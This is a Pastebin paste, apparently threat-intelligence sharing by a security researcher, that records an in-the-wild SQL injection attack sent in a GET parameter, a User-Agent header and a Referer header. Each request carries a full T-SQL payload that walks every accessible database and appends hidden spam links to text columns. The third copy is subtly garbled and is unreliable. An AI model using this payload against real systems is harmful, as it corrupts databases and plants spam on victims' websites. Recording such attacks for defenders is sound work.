Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- GET/file.aspx?id=1);declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''rite aid photo coupon ''+char(60)+''a href="http:''+char(47)+char(47)+''www.mcmurray.biz''+char(47)+''page''+char(47)+''rite-aid-drug-store-locations"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''rite aid card'''' when 1 then ''''read'''' else ''''mcmurray.biz'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' stride rite printable coupons''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0);declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">rite aid photo coupon <a href="http://www.mcmurray.biz/page/rite-aid-drug-store-locations">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''rite aid card'''' when 1 then ''''read'''' else ''''mcmurray.biz'''' end +''''</a> stride rite printable coupons</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
- Referer: http://google.com);declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select db_name() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',db_name());open @b;fetch next from @b into @w;while @@fetch_status=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+table_name+''] set [''+column_name+'']=[''+column_name+'']+case abs(checksum(newid()))%10 when 0 then ''''<div style="display:none">rite aid photo coupon <a href="http:/www.mcmurray.biz/page/rite-aid-drug-store-locations">''''+case abs(checksum(newid()))3 when 0 then ''''rite aid card'''' when 1 then ''''read'''' else ''''mcmurray.biz'''' end +''''</a> stride rite printable coupons</div>'''' else '''''''' end'' from sysindexes as i inner join sysobjects as o on i.id=o.id inner join information_schema.columns on o.name=table_name where(indid in (0,1)) and data_type like ''varchar'' and(character_maximum_length in (2147483647,-1));open @c;fetch next from @c into @d;while @@fetch_status=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
- *******
- *******
- *******
- More FROM @neonprimetime security
- http://pastebin.com/u/Neonprimetime
- https://www.virustotal.com/en/USER/neonprimetime/
- https://twitter.com/neonprimetime
- https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment